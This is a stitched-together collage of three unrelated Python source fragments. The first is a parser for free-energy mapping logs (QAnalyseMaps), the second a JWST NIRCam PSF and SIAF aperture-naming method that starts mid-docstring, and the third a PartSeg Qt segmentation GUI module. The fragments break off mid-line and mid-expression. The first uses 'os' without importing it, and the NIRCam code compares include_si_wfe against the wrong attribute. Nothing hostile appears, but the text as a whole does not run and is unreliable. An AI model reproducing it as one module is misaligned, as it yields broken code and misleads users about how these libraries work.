import subprocess
import tempfile
import re
from qscripts_config import QScriptsConfig as QScfg
from lib.common import DataContainer, np, backup_file, __version__
class QAnalyseMapError(Exception):
pass
class QAnalyseMaps():
def __init__(self, mapped_directories, qfep_out=QScfg.get("files","qfep_out"), _qanalysemaplist=None):
# failed are those that fail to give dGa and dG0 values
self._analysed = [] # _QAnalyseMap instances
self._failed = [] # ( path, errorstring ) tuples
self._exclusions = {} # { "full_88_177": QAnalyseMaps_instance, ... }
self._dgas = []
self._dg0s = []
if not isinstance(mapped_directories, list):
mapped_directories = [mapped_directories,]
self._mapped_directories = mapped_directories
# analyse the maps
# if _qanalysemaplist is not passed in create new _QAnalyseMap objects
if not _qanalysemaplist:
qanlist = []
for md in mapped_directories:
mfile=os.path.join(md, qfep_out)
qanlist.append( _QAnalyseMap(mfile) )
else:
qanlist = _qanalysemaplist
# parse and analyse the maps
for qan in qanlist:
try:
qan._parse()
dga,dg0 = qan.get_dGa(), qan.get_dG0()
self._analysed.append(qan)
self._dgas.append(dga)
self._dg0s.append(dg0)
except Exception as e: # catch everything
#raise # enable this for debug
self._failed.append( (qan.get_dirname(), e) )
# If _qanalysemaplist was not passed in (the object was called from outside), iterate through the analysed objects and check for exclusions
# If they exist, create new QAnalyseMaps objects from them, and add to self._exclusions dictionary
if not _qanalysemaplist:
exclusions = {}
for qan in self._analysed:
for name, excl in qan._get_exclusions().iteritems():
if name not in exclusions.keys():
exclusions[name] = []
exclusions[name].append( excl )
for name, qans in exclusions.iteritems():
self._exclusions[name] = QAnalyseMaps(self._mapped_directories, _qanalysemaplist=qans)
def get_exclusions(self):
return self._exclusions
def get_dGa_mean(self):
return np.mean( self._dgas )
def get_dG0_mean(self):
return np.mean( self._dg0s )
def get_analysed(self):
return self._analysed # populated in __init__
def get_failed(self):
return self._failed # populated in __init__
def get_dGa_stdev(self):
return np.std(self._dgas, ddof=1)
def get_dG0_stdev(self):
return np.std(self._dg0s, ddof=1)
def get_dGa_median(self):
return np.median(self._dgas)
def get_dG0_median(self):
return np.median(self._dg0s)
def get_extrema_lambdas(self):
# get the lambdas that are most frequent in the replicas
min1_ls, min2_ls, max_ls = {}, {}, {}
for an in self.get_analysed():
a,b,c = an.get_extrema_lambdas()
min1_ls[a] = min1_ls.get(a, 0) + 1
max_ls[b] = max_ls.get(b, 0) + 1
min2_ls[c] = min2_ls.get(c, 0) + 1
min1_l = max(min1_ls, key = lambda x: min1_ls[x])
max_l = max(max_ls, key = lambda x: max_ls[x])
min2_l = max(min2_ls, key = lambda x: min2_ls[x])
return (min1_l, max_l, min2_l)
def get_average_GCs(self, lambda1, lambda2, first_res=1, last_res=None, cached=False, solvent=False, qmaskfile=None):
# returns averages and stds for the group contributions
average_GCs = DataContainer( ["Residue id", "VdW(%5.4f-%5.4f)_mean" % (lambda2, lambda1),
"VdW(%5.4f-%5.4f)_stdev" % (lambda2, lambda1),
"El(%5.4f-%5.4f)_mean" % (lambda2, lambda1),
"El(%5.4f-%5.4f)_stdev" % (lambda2, lambda1) ] )
average_GCs.comment = "Group contribution statistics at lambdas: %s, %s" % (lambda1, lambda2)
gcs={}
for an in self.get_analysed():
gc = an.get_group_contributions(lambda1,lambda2,first_res=first_res,last_res=last_res, cached=cached, solvent=solvent, qmaskfile=qmaskfile)
for rc in gc.get_rows():
resid = rc[0]
values = [ [val,] for val in rc[1:] ]
if not gcs.has_key(resid):
gcs[resid] = values
else:
for i,val in enumerate(gcs[resid]):
val.extend( values[i] )
# iterate through each residue
for resid in sorted(gcs.keys()):
rc = gcs[resid]
# get mean and stdev
rc_stats = [ resid,
np.mean(rc[0]), np.std(rc[0]), # vdw
np.mean(rc[1]), np.std(rc[1]) ] # el
average_GCs.add_row(rc_stats)
average_GCs.comment += "\n# "
return average_GCs
def get_average_LRAs(self, lambda1, lambda2):
# returns averages and stds for LRAs
an_maps = self.get_analysed()
if len(an_maps) != 0:
average_lras = DataContainer( [ "E_type", "(E2-E1)_10_mean", "(E2-E1)_10_std", "(E2-E1)_01_mean", "(E2-E1)_01_std", "LRA_mean", "LRA_std", "REORG_mean", "REORG_std" ] )
average_lras.comment = " LRA statistics"
allvals=[]
for an in an_maps:
lra=an.get_lra(lambda1,lambda2)
rows = lra.get_rows()
for irow,row in enumerate(rows):
try:
allvals[irow].append( row )
except IndexError:
allvals.append( [row, ] )
# allvals now looks like this:
# [
# [
# ["EQtot", EQtot_de_st1_1, EQtot_de_st2_1, EQtot_lra_1, EQtot_reorg_1],
# ["EQtot", EQtot_de_st1_2, EQtot_de_st2_2, ...], ...
# ],
# [
# ["EQbond", EQbond_de_st1_1, EQbond_de_st2_1, EQbond_lra_1, EQbond_reorg_1],
# ["EQbond", EQbond_de_st1_2, EQbond_de_st2_2, ...], ...
# ]
# ]
#
for values in allvals:
# transpose to get [ ["EQtot","EQtot"...], [ EQtot_de_st1_1, EQtot_de_st1_2,...], [EQtot_de_st2_1,EQtot_de_st2_2,...], ...]
values = zip(*values)
# now they can be easily averaged and std-ed
e_type = values[0][0]
de_st1_mean = np.mean(values[1])
de_st2_mean = np.mean(values[2])
lra_mean = np.mean(values[3])
reo_mean = np.mean(values[4])
de_st1_std = np.std(values[1])
de_st2_std = np.std(values[2])
lra_std = np.std(values[3])
reo_std = np.std(values[4])
average_lras.add_row( [e_type, de_st1_mean, de_st1_std, de_st2_mean, de_st2_std, lra_mean, lra_std, reo_mean, reo_std] )
return average_lras
def get_summary(self):
# This function calculates means, deviations, medians (of dGa and dG0),
# it looks for dGa outliers (>3s) and removes them
# It returns a string containing all results in a neat format.
allres = {}
allres["n"] = len(self._dgas)
allres["dga"] = (self.get_dGa_mean(),self.get_dGa_stdev(),self.get_dGa_median())
allres["dg0"] = (self.get_dG0_mean(),self.get_dG0_stdev(),self.get_dG0_median())
qams = []
warns = []
for qam in self._analysed:
rp = os.path.relpath(qam.get_dirname()) + os.path.sep
min1,ts,min2 = qam.get_extrema_lambdas()
qams.append( "%-40s %8.2f %8.2f %8.4f %8.4f %8.4f" % (rp, qam.get_dGa(), qam.get_dG0(), min1, ts, min2) )
w = qam.get_warnings()
if w:
warns.append( "%s:\n-- %s" % (rp, "\n-- ".join( w ) ) )
if warns:
allres["warnings"] = "WARNINGS: %d\n%s" %( len(warns), "\n".join(warns) )
else:
allres["warnings"] = "Warnings: None"
allres["analysed"] = "\n".join( sorted( qams ) )
if self._failed:
errors = "\n".join( [ "%s -> %s " % (n, e) for n,e in self._failed ] )
allres["fails"] = "FAILED: %d\n%s" % ( len(self._failed), errors )
else:
allres["fails"] = "Failed to analyse: None"
return """
---------------------------- QAnalyseMaps SUMMARY ----------------------------
Analysed with version: {version}
DIRNAMES dG# dG0 RS_l TS_l PS_l
{analysed}
Assuming normal distribution...
N={n} Mean St.dev Median
dG# {dga[0]:10.2f} {dga[1]:10.2f} {dga[2]:10.2f}
dG0 {dg0[0]:10.2f} {dg0[1]:10.2f} {dg0[2]:10.2f}
{fails}
{warnings}
------------------------------------------------------------------------------
""".format( version=__version__, **allres )
class _QAnalyseMap():
def __init__(self, mappinglogfile, _logfilestring=None):
self._mappinglogfile = mappinglogfile
self._dirname = os.path.dirname(os.path.abspath(mappinglogfile))
self._warnings = []
self._exclusions = {} # { "full_386" : _QAanalyseMap_instance, ... }
# compiled REs
self._PART0_RE = re.compile("(# Part 0.*?)# Part 1", re.DOTALL)
self._PART1_RE = re.compile("(# Part 1.*?)# Part 2", re.DOTALL)
self._PART2_RE = re.compile("(# Part 2.*?)# Part 3", re.DOTALL)
self._PART3_RE = re.compile("(# Part 3.*?)# Part 1", re.DOTALL) # '# Part 1' is added manually to the end of the logfile
self._EXCL_RE = re.compile("Calculation for system with (\w+) exclusion, residues (.*?\n)", re.DOTALL)
# constants
self._PART0_HEADER = "# file state pts lambda EQtot EQbond EQang EQtor EQimp EQel EQvdW Eel_qq EvdW_qq Eel_qp EvdW_qp Eel_qw EvdW_qw Eqrstr"
self._PART1_HEADER = "# lambda(1) dGf sum(dGf) dGr sum(dGr) <dG>"
self._PART2_HEADER = "# Lambda(1) bin Energy gap dGa dGb dGg # pts c1**2 c2**2"
self._PART3_HEADER = "# bin energy gap <dGg> <dGg | |
the type of observation.
Odd number place the PSF on the center of the pixel,
whereas an even number centers it on the "crosshairs."
oversample : int
Factor to oversample during WebbPSF calculations.
Default 2 for coronagraphy and 4 otherwise.
include_si_wfe : bool
Include SI WFE measurements? Default=True.
include_distortions : bool
If True, will include a distorted version of the PSF.
pupil : str
File name or HDUList specifying telescope entrance pupil.
Can also be an OTE_Linear_Model.
pupilopd : tuple or HDUList
Tuple (file, index) or filename or HDUList specifying OPD.
Can also be an OTE_Linear_Model.
wfe_drift : float
Wavefront error drift amplitude in nm.
offset_r : float
Radial offset from the center in arcsec.
offset_theta :float
Position angle for radial offset, in degrees CCW.
bar_offset : float
For wedge masks, option to set the PSF position across the bar.
jitter : str or None
Currently either 'gaussian' or None.
jitter_sigma : float
If ``jitter = 'gaussian'``, then this is the size of the blurring effect.
npsf : int
Number of wavelengths/PSFs to fit.
ndeg : int
Degree of polynomial fit.
nproc : int
Manual setting of number of processor cores to break up PSF calculation.
If set to None, this is determined based on the requested PSF size,
number of available memory, and hardware processor cores. The automatic
calculation endeavors to leave a number of resources available to the
user so as to not crash the user's machine.
save : bool
Save the resulting PSF coefficients to a file? (default: True)
force : bool
Forces a recalcuation of PSF even if saved PSF exists. (default: False)
quick : bool
Only perform a fit over the filter bandpass with a lower default polynomial degree fit.
(default: True)
use_legendre : bool
Fit with Legendre polynomials, an orthonormal basis set. (default: True)
"""
update_coeffs = False
update_bg_coeffs = False
# filter, pupil mask, and image mask
if (filter is not None) and (filter != self.filter):
update_coeffs = True
update_bg_coeffs = True
self.filter = filter
if (pupil_mask is not None) and (pupil_mask != self.pupil_mask):
update_coeffs = True
update_bg_coeffs = True
if (pupil_mask.upper()=="CLEAR") or (pupil_mask.upper()=="NONE"):
pupil_mask = None
self.pupil_mask = pupil_mask
if (image_mask is not None) and (image_mask != self.image_mask):
update_coeffs = True
update_bg_coeffs = True
if (image_mask.upper()=="CLEAR") or (image_mask.upper()=="NONE"):
image_mask = None
self.image_mask = image_mask
if (fov_pix is not None) and (fov_pix != self.fov_pix):
update_coeffs = True
self.fov_pix = fov_pix
if (oversample is not None) and (oversample != self.oversample):
update_coeffs = True
self.oversample = oversample
# SI WFE and distortions
if (include_si_wfe is not None) and (include_distortions != self.include_distortions):
update_coeffs = True
self.include_si_wfe = include_si_wfe
if (include_distortions is not None) and (include_distortions != self.include_distortions):
update_coeffs = True
self.include_distortions = include_distortions
# Pupil OPD information
if (pupil is not None) and (self.pupil != pupil):
update_coeffs = True
self.pupil = pupil
if (pupilopd is not None) and (self.pupilopd != pupilopd):
update_coeffs = True
self.pupilopd = pupilopd
# Source and mask offsetting
if (offset_r is not None) and (self.options.get('source_offset_r') != offset_r):
update_coeffs = True
self.options['source_offset_r'] = offset_r
if (offset_theta is not None) and (self.options.get('source_offset_theta') != offset_theta):
update_coeffs = True
self.options['source_offset_theta'] = offset_theta
if (bar_offset is not None) and (self.options.get('bar_offset') != bar_offset):
update_coeffs = True
self.options['bar_offset'] = bar_offset
# Jitter
if (jitter is not None) and (self.options.get('jitter') != jitter):
update_coeffs = True
self.options['jitter'] = jitter
if (jitter_sigma is not None) and (self.options.get('jitter_sigma') != jitter_sigma):
update_coeffs = True
self.options['jitter_sigma'] = jitter_sigma
# Misecellaneous
if (npsf is not None) and (self.npsf != npsf):
update_coeffs = True
self.npsf = npsf
if (ndeg is not None) and (self.ndeg != ndeg):
update_coeffs = True
self.ndeg = ndeg
if (quick is not None) and (self.quick != quick):
update_coeffs = True
self.quick = quick
if (use_legendre is not None) and (self.use_legendre != use_legendre):
update_coeffs = True
self.use_legendre = use_legendre
# Detector update
if detector is not None:
update_coeffs = True
self.detector = get_detname(detector)
self.update_detectors()
# Regenerate PSF coefficients
if update_coeffs:
del self.psf_coeff, self.psf_coeff_header
save = True if save is None else save
self.gen_psf_coeff(save=save, force=force, nproc=nproc, **kwargs)
# Update drift, field, and mask-dependent coefficients
if self._psf_coeff_mod['wfe_drift'] is not None:
self.gen_wfedrift_coeff()
if self._psf_coeff_mod['si_field'] is not None:
self.gen_wfefield_coeff()
if self._psf_coeff_mod['si_mask'] is not None:
self.gen_wfemask_coeff()
# Update bg class if filter or pupil mask is changed
if update_bg_coeffs:
self._update_bg_class()
@property
def psf_info(self):
"""PSF parameters"""
d_options = self.options
d = {
'fov_pix': self.fov_pix, 'oversample': self.oversample,
'npsf': self.npsf, 'ndeg': self.ndeg, 'include_si_wfe': self.include_si_wfe,
'include_distortions': self.include_distortions,
'jitter': d_options.get('jitter'), 'jitter_sigma': d_options.get('jitter_sigma'),
'offset_r': d_options.get('source_offset_r', 0), 'offset_theta': d_options.get('source_offset_theta', 0),
'bar_offset': d_options.get('bar_offset', None),
'pupil': self.pupil, 'pupilopd': self.pupilopd,
}
return d
@property
def multiaccum(self):
""":class:`multiaccum` object"""
return self.Detector.multiaccum
@property
def multiaccum_times(self):
"""Exposure timings in dictionary
t_frame : Time of a single frame.
t_group : Time of a single group (read frames + drop frames).
t_int : Photon collection time for a single ramp/integration.
t_int_tot1: Total time for all frames (reset+read+drop) in a first ramp.
t_int_tot2: Total time for all frames (reset+read+drop) in a subsequent ramp.
t_exp : Total photon collection time for all ramps.
t_acq : Total acquisition time to complete exposure with all overheads.
"""
return self.Detector.times_to_dict()
@property
def det_info(self):
"""Dictionary housing detector info parameters and keywords."""
return self._det_info
@property
def well_level(self):
"""Detector well level in units of electrons"""
return self.Detector.well_level
@property
def siaf_ap_names(self):
"""Give all possible SIAF aperture names"""
return list(self.siaf.apernames)
def get_siaf_apname(self):
"""Get SIAF aperture based on instrument settings"""
# Return already defined ap name
# if (self.siaf_ap is not None) and (not override):
# return self.siaf_ap.AperName
# else:
detid = self.Detector.detid
wind_mode = self.Detector.wind_mode
is_lyot = self.is_lyot
is_coron = self.is_coron
is_grism = self.is_grism
pupil_mask = self.pupil_mask
if self.channel=='long' or self.channel=='LW':
channel = 'LW'
else:
channel = 'SW'
# Time series filters
ts_filters = ['F277W','F356W','F444W','F322W2']
# Coronagraphic bar filters
swb_filters = ['F182M','F187N','F210M','F212N','F200W']
lwb_filters = [
'F250M','F300M','F277W','F335M','F360M',
'F356W','F410M','F430M','F460M','F480M','F444W'
]
# Coronagraphy
if is_coron:
wstr = 'FULL_' if wind_mode=='FULL' else ''
key = '<KEY>'.format(detid,wstr,self.image_mask)
if ('WB' in self.image_mask) and (self.module=='A') and (self.filter in swb_filters+lwb_filters):
key = key + '_{}'.format(self.filter)
if wind_mode=='STRIPE':
key = None
# Just Lyot stop without masks, assuming TA aperture
elif is_lyot: #and self.ND_acq:
tastr = 'TA' if self.ND_acq else 'FSTA'
key = 'NRC{}_{}'.format(detid,tastr)
if ('CIRC' in pupil_mask) and ('SW' in channel):
key = key + 'MASK210R'
elif ('CIRC' in pupil_mask) and ('LW' in channel):
key = key + 'MASK430R' if ('F4' in self.filter) else key + 'MASK335R'
elif ('WEDGE' in pupil_mask) and ('SW' in channel):
key = key + 'MASKSWB'
elif ('WEDGE' in pupil_mask) and ('LW' in channel):
key = key + 'MASKLWB'
# Time series grisms
elif is_grism and ('GRISMR' in pupil_mask) and (self.filter in ts_filters):
if wind_mode=='FULL':
key = f'NRC{detid}_GRISM_{self.filter}'
elif wind_mode=='STRIPE':
key = 'NRC{}_GRISM{}_{}'.format(detid,self.det_info['ypix'],self.filter)
else:
key = None
# SW Time Series with LW grism
elif wind_mode=='STRIPE':
key = 'NRC{}_GRISMTS{:.0f}'.format(detid,self.det_info['ypix'])
# WFSS
elif is_grism and (wind_mode=='FULL'):
key = '<KEY>'.format(detid, pupil_mask)
# Subarrays
elif wind_mode=='WINDOW':
key = 'NRC{}_SUB{}P'.format(detid,self.det_info['xpix'])
if key not in self.siaf_ap_names:
key = 'NRC{}_TAPSIMG{}'.format(detid,self.det_info['xpix'])
if key not in self.siaf_ap_names:
key = 'NRC{}_TAGRISMTS{}'.format(detid,self.det_info['xpix'])
if key not in self.siaf_ap_names:
key = 'NRC{}_TAGRISMTS_SCI_{}'.format(detid,self.filter)
if key not in self.siaf_ap_names:
key = 'NRC{}_SUB{}'.format(detid,self.det_info['xpix'])
# Full frame generic
elif wind_mode=='FULL':
key = 'NRC{}_FULL'.format(detid)
else:
key = None
# Check if key exists
if key in self.siaf_ap_names:
_log.info('Suggested SIAF aperture name: {}'.format(key))
return key
else:
_log.warning("Suggested SIAF aperture name '{}' is not defined".format(key))
return None
def get_subarray_name(self, apname=None):
"""Get JWST NIRCam subarray name"""
if apname is None:
apname = self.get_siaf_apname()
pupil_mask = self.pupil_mask
image_mask = self.image_mask
module = self.module
detid = self.Detector.detid
wind_mode = self.Detector.wind_mode
ypix = self.det_info['ypix']
is_lyot = self.is_lyot
is_coron = self.is_coron
is_grism = self.is_grism
is_ndacq = self.ND_acq
if 'FULL' in wind_mode:
subarray_name = 'FULLP' if apname[-1] == 'P' else 'FULL'
elif 'STRIPE' in wind_mode:
subarray_name = f'SUBGRISM{ypix}'
elif is_coron:
sub_str = f'SUB{ypix}'
mask_str = image_mask[4:]
if ('335R' in image_mask) and (module == 'A'):
subarray_name = sub_str | |
import os
import sys
from pathlib import Path
from typing import Type
import numpy as np
from qtpy.QtCore import QByteArray, QEvent, Qt
from qtpy.QtGui import QIcon, QKeyEvent, QKeySequence, QResizeEvent
from qtpy.QtWidgets import (
QCheckBox,
QComboBox,
QGridLayout,
QHBoxLayout,
QInputDialog,
QLabel,
QMessageBox,
QPushButton,
QVBoxLayout,
QWidget,
)
import PartSegData
from PartSeg.common_gui.custom_load_dialog import CustomLoadDialog
from PartSeg.common_gui.main_window import BaseMainMenu, BaseMainWindow
from PartSeg.common_gui.stacked_widget_with_selector import StackedWidgetWithSelector
from PartSeg.segmentation_analysis.measurement_widget import MeasurementWidget
from PartSegCore import state_store
from PartSegCore.algorithm_describe_base import SegmentationProfile
from PartSegCore.analysis import ProjectTuple, algorithm_description, load_functions
from PartSegCore.analysis.analysis_utils import SegmentationPipeline, SegmentationPipelineElement
from PartSegCore.analysis.io_utils import create_history_element_from_project
from PartSegCore.analysis.save_functions import save_dict
from PartSegCore.io_utils import HistoryElement, WrongFileTypeException
from PartSegCore.mask_create import calculate_mask_from_project
from PartSegCore.segmentation.algorithm_base import SegmentationResult
from PartSegCore.segmentation_info import SegmentationInfo
from PartSegImage import TiffImageReader
from ..common_gui.algorithms_description import AlgorithmChoose, InteractiveAlgorithmSettingsWidget
from ..common_gui.channel_control import ChannelProperty
from ..common_gui.custom_save_dialog import SaveDialog
from ..common_gui.equal_column_layout import EqualColumnLayout
from ..common_gui.mask_widget import MaskDialogBase
from ..common_gui.multiple_file_widget import MultipleFileWidget
from ..common_gui.stack_image_view import ColorBar
from ..common_gui.universal_gui_part import TextShow
from ..common_gui.waiting_dialog import ExecuteFunctionDialog, WaitingDialog
from .advanced_window import SegAdvancedWindow
from .batch_window import BatchWindow
from .calculation_pipeline_thread import CalculatePipelineThread
from .image_view import CompareImageView, ResultImageView, SynchronizeView
from .partseg_settings import PartSettings
CONFIG_FOLDER = os.path.join(state_store.save_folder, "analysis")
class Options(QWidget):
def __init__(
self,
settings: PartSettings,
channel_control2: ChannelProperty,
left_image: ResultImageView,
main_image: ResultImageView,
synchronize: SynchronizeView,
):
super().__init__()
self._settings = settings
self.left_panel = left_image
self._ch_control2 = channel_control2
self.synchronize_val = False
self.hide_left_panel_chk = QCheckBox("Hide left panel")
self.hide_left_panel_chk.stateChanged.connect(self.hide_left_panel)
self.synchronize_checkbox = QCheckBox("Synchronize view")
self.synchronize_checkbox.stateChanged.connect(synchronize.set_synchronize)
self.interactive_use = QCheckBox("Interactive use")
self.execute_btn = QPushButton("Execute")
self.execute_btn.clicked.connect(self.execute_algorithm)
self.execute_btn.setStyleSheet("QPushButton{font-weight: bold;}")
self.save_pipe_btn = QPushButton("Save pipeline")
self.save_pipe_btn.clicked.connect(self.save_pipeline)
self.save_pipe_btn.setToolTip("Save current pipeline. Last element is last executed algorithm")
self.choose_pipe = QComboBox()
self.choose_pipe.addItem("<none>")
self.choose_pipe.addItems(list(self._settings.segmentation_pipelines.keys()))
self.choose_pipe.currentTextChanged.connect(self.choose_pipeline)
self.choose_pipe.setToolTip("Execute chosen pipeline")
self.save_profile_btn = QPushButton("Save profile")
self.save_profile_btn.setToolTip("Save values from current view")
self.save_profile_btn.clicked.connect(self.save_profile)
self.choose_profile = QComboBox()
self.choose_profile.addItem("<none>")
self.choose_profile.addItems(list(self._settings.segmentation_profiles.keys()))
self.choose_profile.setToolTip("Select profile to restore its settings. Execute if interactive is checked")
# image state
self.compare_btn = QPushButton("Compare")
self.compare_btn.setDisabled(True)
self.compare_btn.clicked.connect(self.compare_action)
left_image.hide_signal.connect(self.compare_btn.setHidden)
self.update_tooltips()
self.choose_profile.currentTextChanged.connect(self.change_profile)
self.interactive_use.stateChanged.connect(self.execute_btn.setDisabled)
self.interactive_use.stateChanged.connect(self.interactive_change)
self.algorithm_choose_widget = AlgorithmChoose(settings, algorithm_description.analysis_algorithm_dict)
self.algorithm_choose_widget.result.connect(self.execution_done)
self.algorithm_choose_widget.finished.connect(self.calculation_finished)
self.algorithm_choose_widget.value_changed.connect(self.interactive_algorithm_execute)
self.algorithm_choose_widget.algorithm_changed.connect(self.interactive_algorithm_execute)
self.label = TextShow()
# self.label.setWordWrap(True)
# self.label.setTextInteractionFlags(Qt.TextSelectableByMouse)
layout = QVBoxLayout()
layout2 = QHBoxLayout()
layout2.setSpacing(1)
layout2.setContentsMargins(0, 0, 0, 0)
layout3 = QHBoxLayout()
layout3.setContentsMargins(0, 0, 0, 0)
layout.setContentsMargins(0, 0, 0, 0)
layout5 = QHBoxLayout()
layout5.setContentsMargins(0, 0, 0, 0)
layout5.addWidget(self.save_pipe_btn)
layout5.addWidget(self.choose_pipe)
layout4 = QHBoxLayout()
layout4.setContentsMargins(0, 0, 0, 0)
layout4.addWidget(self.save_profile_btn)
layout4.addWidget(self.choose_profile)
layout3.addWidget(self.interactive_use)
layout3.addWidget(self.execute_btn)
layout.addLayout(layout5)
layout.addLayout(layout4)
layout.addLayout(layout3)
layout.addWidget(self.algorithm_choose_widget, 1)
# layout.addLayout(self.stack_layout)
layout.addWidget(self.label)
# layout.addStretch(1)
layout2.addWidget(self.hide_left_panel_chk)
layout2.addWidget(self.synchronize_checkbox)
layout.addLayout(layout2)
layout.addWidget(self._ch_control2)
# layout.setSpacing(0)
self.setLayout(layout)
def compare_action(self):
if self.compare_btn.text() == "Compare":
self._settings.set_segmentation_to_compare(self._settings.segmentation_info)
self.compare_btn.setText("Remove")
else:
self._settings.set_segmentation_to_compare(SegmentationInfo(None))
self.compare_btn.setText("Compare")
def calculation_finished(self):
self.execute_btn.setDisabled(self.interactive_use.isChecked())
self.interactive_use.setEnabled(True)
def save_pipeline(self):
history = self._settings.get_history()
if not history:
QMessageBox.information(self, "No mask created", "There is no new mask created", QMessageBox.Ok)
return
mask_history = []
for el in history:
mask = el.mask_property
segmentation = SegmentationProfile(
name="Unknown",
algorithm=el.segmentation_parameters["algorithm_name"],
values=el.segmentation_parameters["values"],
)
new_el = SegmentationPipelineElement(mask_property=mask, segmentation=segmentation)
mask_history.append(new_el)
name = self._settings.last_executed_algorithm
if not name:
QMessageBox.information(self, "No segmentation", "No segmentation executed", QMessageBox.Ok)
return
values = self._settings.get(f"algorithms.{name}", {})
if len(values) == 0:
QMessageBox.information(self, "Some problem", "Pleas run execution again", QMessageBox.Ok)
return
current_segmentation = SegmentationProfile(name="Unknown", algorithm=name, values=values)
while True:
text, ok = QInputDialog.getText(self, "Pipeline name", "Input pipeline name here")
if not ok:
return
if text in self._settings.segmentation_pipelines:
if QMessageBox.No == QMessageBox.warning(
self,
"Already exists",
"Profile with this name already exist. Overwrite?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No,
):
continue
profile = SegmentationPipeline(name=text, segmentation=current_segmentation, mask_history=mask_history)
self._settings.segmentation_pipelines[text] = profile
self._settings.dump()
self.choose_pipe.addItem(text)
break
def choose_pipeline(self, text):
if text == "<none>":
return
pipeline = self._settings.segmentation_pipelines[text]
process_thread = CalculatePipelineThread(self._settings.image, self._settings.mask, pipeline)
dial = WaitingDialog(process_thread)
if dial.exec() and process_thread.result:
pipeline_result = process_thread.result
self._settings.mask = pipeline_result.mask
self._settings.segmentation = pipeline_result.segmentation
self._settings.full_segmentation = pipeline_result.full_segmentation
self._settings.set_history(pipeline_result.history)
self.label.setText(pipeline_result.description)
self.algorithm_choose_widget.change_algorithm(pipeline.segmentation.algorithm, pipeline.segmentation.values)
self.choose_pipe.setCurrentIndex(0)
def update_tooltips(self):
for i in range(1, self.choose_profile.count()):
if self.choose_profile.itemData(i, Qt.ToolTipRole) is not None:
continue
text = self.choose_profile.itemText(i)
profile: SegmentationProfile = self._settings.segmentation_profiles[text]
tool_tip_text = str(profile)
self.choose_profile.setItemData(i, tool_tip_text, Qt.ToolTipRole)
for i in range(1, self.choose_pipe.count()):
if self.choose_pipe.itemData(i, Qt.ToolTipRole) is not None:
continue
text = self.choose_pipe.itemText(i)
profile: SegmentationPipeline = self._settings.segmentation_pipelines[text]
tool_tip_text = str(profile)
self.choose_pipe.setItemData(i, tool_tip_text, Qt.ToolTipRole)
@staticmethod
def update_combo_box(combo_box: QComboBox, dkt: dict):
current_names = set(dkt.keys())
prev_names = {combo_box.itemText(i) for i in range(1, combo_box.count())}
new_names = current_names - prev_names
delete_names = prev_names - current_names
if len(delete_names) > 0:
i = 1
while i < combo_box.count():
if combo_box.itemText(i) in delete_names:
combo_box.removeItem(i)
else:
i += 1
if len(new_names) > 0:
combo_box.addItems(list(sorted(new_names)))
def event(self, event: QEvent):
if event.type() == QEvent.WindowActivate:
# update combobox for segmentation
self.update_combo_box(self.choose_profile, self._settings.segmentation_profiles)
# update combobox for pipeline
self.update_combo_box(self.choose_pipe, self._settings.segmentation_pipelines)
self.update_tooltips()
return super().event(event)
def keyPressEvent(self, event: QKeyEvent):
if (event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return) and (event.modifiers() == Qt.ControlModifier):
self.execute_btn.click()
def save_profile(self):
widget: InteractiveAlgorithmSettingsWidget = self.algorithm_choose_widget.current_widget()
while True:
text, ok = QInputDialog.getText(self, "Profile Name", "Input profile name here")
if not ok:
return
if text in self._settings.segmentation_profiles:
if QMessageBox.No == QMessageBox.warning(
self,
"Already exists",
"Profile with this name already exist. Overwrite?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No,
):
continue
resp = SegmentationProfile(text, widget.name, widget.get_values())
self._settings.segmentation_profiles[text] = resp
self._settings.dump()
self.choose_profile.addItem(text)
self.update_tooltips()
break
def change_profile(self, val):
self.choose_profile.setToolTip("")
if val == "<none>":
return
interactive = self.interactive_use.isChecked()
self.interactive_use.setChecked(False)
profile = self._settings.segmentation_profiles[val]
self.algorithm_choose_widget.change_algorithm(profile.algorithm, profile.values)
self.choose_profile.blockSignals(True)
self.choose_profile.setCurrentIndex(0)
self.choose_profile.blockSignals(False)
self.interactive_use.setChecked(interactive)
@property
def segmentation(self):
return self._settings.segmentation
@property
def interactive(self):
return self.interactive_use.isChecked()
def hide_left_panel(self, val):
self._settings.set_in_profile("hide_left_panel", val)
if val:
self.synchronize_val = self.synchronize_checkbox.isChecked()
self.synchronize_checkbox.setChecked(False)
else:
self.synchronize_checkbox.setChecked(self.synchronize_val)
self.synchronize_checkbox.setDisabled(val)
self.left_panel.parent().setHidden(val)
def interactive_change(self, val):
if val:
self.execute_algorithm()
def algorithm_change(self, val):
self._settings.set("current_algorithm", val)
if self.interactive:
self.execute_algorithm()
def interactive_algorithm_execute(self):
if self.interactive:
self.execute_algorithm()
def execute_algorithm(self):
widget: InteractiveAlgorithmSettingsWidget = self.algorithm_choose_widget.current_widget()
if self._settings.image.is_time and not widget.algorithm.support_time():
QMessageBox.information(
self, "Not supported", "This algorithm do not support time data. " "You can convert it in image adjust"
)
return
if self._settings.image.is_stack and not widget.algorithm.support_z():
QMessageBox.information(
self, "Not supported", "This algorithm do not support stack data. " "You can convert it in image adjust"
)
return
self._settings.last_executed_algorithm = widget.name
self.execute_btn.setDisabled(True)
self.interactive_use.setDisabled(True)
widget.execute()
def execution_done(self, segmentation: SegmentationResult):
if segmentation.info_text != "":
QMessageBox.information(self, "Algorithm info", segmentation.info_text)
self._settings.segmentation = segmentation.segmentation
self.compare_btn.setEnabled(
isinstance(segmentation.segmentation, np.ndarray) and np.any(segmentation.segmentation)
)
self._settings.additional_layers = segmentation.additional_layers
self.label.setText(self.sender().get_info_text())
def showEvent(self, _event):
self.hide_left_panel_chk.setChecked(self._settings.get_from_profile("hide_left_panel", False))
class MainMenu(BaseMainMenu):
def __init__(self, settings: PartSettings, main_window):
super().__init__(settings, main_window)
self.settings = settings
self.open_btn = QPushButton("Open")
self.save_btn = QPushButton("Save")
self.advanced_btn = QPushButton("Settings and Measurement")
self.mask_manager_btn = QPushButton("Mask manager")
self.batch_processing_btn = QPushButton("Batch Processing")
layout = QHBoxLayout()
# layout.setSpacing(0)
layout.setContentsMargins(0, 0, 4, 4)
layout.addWidget(self.open_btn)
layout.addWidget(self.save_btn)
layout.addWidget(self.advanced_btn)
layout.addWidget(self.mask_manager_btn)
layout.addWidget(self.batch_processing_btn)
self.setLayout(layout)
self.open_btn.clicked.connect(self.load_data)
self.save_btn.clicked.connect(self.save_file)
self.advanced_btn.clicked.connect(self.advanced_window_show)
self.mask_manager_btn.clicked.connect(self.mask_manager)
self.batch_processing_btn.clicked.connect(self.batch_window)
